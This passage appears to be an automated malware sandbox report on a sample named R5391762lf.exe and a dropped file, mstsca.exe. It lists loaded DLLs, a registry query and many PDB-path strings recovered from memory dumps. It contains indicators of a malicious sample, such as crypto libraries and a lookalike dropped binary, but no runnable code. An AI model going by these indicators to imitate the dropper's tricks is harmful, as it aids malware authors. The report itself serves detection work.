Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\R5391762lf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: R5391762lf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\41\\5bU)% source: R5391762lf.exe, 00000007.00000003.2101462932.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ m[%K source: R5391762lf.exe, 00000007.00000003.2081897313.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2098573555.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100791102.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2080641815.0000000003787000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079360767.00000000036F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.1681500127.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946799099.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682385197.000000000339B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1948192992.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1622139551.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681962371.0000000003398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2136464726.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146776038.00000000037AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: R5391762lf.exe, 00000007.00000003.2135353595.0000000003BE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\a\\* source: R5391762lf.exe, 00000007.00000003.2135353595.0000000003BE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\a\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\Hq source: R5391762lf.exe, 00000007.00000003.1681931238.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681857238.0000000003192000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\tofagehu\hiv.pdb source: R5391762lf.exe, 00000000.00000000.1365440142.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000000.00000002.1371228997.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000002.00000000.1368723855.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000000.1393141835.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000002.1402790668.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000006.00000000.1394677978.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000006.00000002.1407678085.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000007.00000003.1491373512.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\S source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\kL source: R5391762lf.exe, 00000007.00000003.2083769242.0000000003878000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ar-IQ\\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102031776.00000000038A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ABA671~1A8E3aba6710fde0876af_0ata\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\NV, source: R5391762lf.exe, 00000007.00000003.2068868095.0000000003538000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2066983991.000000000351F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049588960.0000000003505000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049773121.0000000003517000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\8\) source: R5391762lf.exe, 00000007.00000003.2068625676.0000000003494000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067121029.0000000003429000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067819538.0000000003491000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2102219376.0000000003B45000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2136303536.0000000003B65000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102031776.00000000038A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101597700.0000000003B45000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\+D> source: R5391762lf.exe, 00000007.00000003.2049327479.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050729410.0000000003870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2101597700.0000000003ACA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: R5391762lf.exe, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ache\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2083769242.0000000003878000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\d source: R5391762lf.exe, 00000007.00000003.2161564877.0000000003E55000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051158018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051285855.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2052379835.00000000037D7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2161457141.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147352148.0000000003A91000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.1681500127.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946799099.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682385197.000000000339B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1948192992.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1622139551.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681962371.0000000003398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068384745.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068555631.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2149833514.000000000376F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: mstsca.exe, 00000021.00000000.3275270168.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\W source: R5391762lf.exe, 00000007.00000003.1682135563.000000000315F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682296747.000000000316C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682038409.000000000315E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1684204652.0000000003170000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682185359.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\s\ source: R5391762lf.exe, 00000007.00000003.1948567038.0000000003699000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049541715.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Temp\d.pdb\ source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ngs\ source: R5391762lf.exe, 00000007.00000003.2135149537.00000000033A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2135081077.0000000003985000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147440371.00000000039A6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135303170.00000000039D6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.0000000003994000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: R5391762lf.exe, 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, R5391762lf.exe, 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ta\5 source: R5391762lf.exe, 00000007.00000003.2161564877.0000000003E55000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681707652.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1621610422.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: mstsca.exe, 00000021.00000000.3275270168.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ta\ source: R5391762lf.exe, 00000007.00000003.2102219376.0000000003B45000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101597700.0000000003B45000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049327479.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050729410.0000000003870000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068384745.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _C:\tofagehu\hiv.pdb source: R5391762lf.exe, 00000000.00000000.1365440142.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000000.00000002.1371228997.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000002.00000000.1368723855.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000000.1393141835.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000002.1402790668.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000006.00000000.1394677978.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000006.00000002.1407678085.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000007.00000003.1491373512.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681707652.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1621610422.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\re\ source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Y source: R5391762lf.exe, 00000007.00000003.2160881212.00000000038A9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\BlB- source: R5391762lf.exe, 00000007.00000003.2135149537.00000000033A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AC\Temp\wy\ion Data\Application Data\Application Data\Microsoft\input\en-ZW\\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\\\T source: R5391762lf.exe, 00000007.00000003.2079190952.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2078852071.0000000003429000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2083952112.000000000346D000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067121029.0000000003429000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: load_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\M source: R5391762lf.exe, 00000007.00000003.2099831348.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101510258.000000000370A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2081263289.000000000373B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946934767.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100414663.0000000003703000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102557757.0000000003712000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079360767.00000000036F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\AC\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\H\* source: R5391762lf.exe, 00000007.00000003.1682135563.000000000315F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682296747.000000000316C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682038409.000000000315E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1684204652.0000000003170000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682185359.0000000003163000.00000004.00000020.00020000.00000000.sdmp
